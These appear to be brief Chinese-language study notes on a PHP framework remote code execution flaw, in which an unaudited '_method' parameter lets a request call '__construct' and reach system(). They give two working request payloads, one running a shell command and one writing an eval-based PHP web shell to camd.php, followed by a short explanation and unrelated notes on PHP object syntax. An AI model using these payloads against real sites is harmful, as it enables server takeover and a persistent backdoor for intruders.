s=dir&filter[]=system&_method=__construct&method=*
s=echo “<?php @eval($_POST['attack']);?>” >camd.php&filter[]=system&_method=__construct&method=*
原理就是网站代码在设计时有两个函数可以相互传值,可以间接的把 __construct():构造函数/方法直接传进去执行,你看payload为什么会直接执行黑进去,就是因为在_method这个魔术常量没有审计用户会调用值进去。
看教程时几个关键点的知识点:
$user->friends_count
取对象的friends_count属性。
$t->homeTimeline($p)
调用对象的homeTimeline方法,方法中传入一个参数$p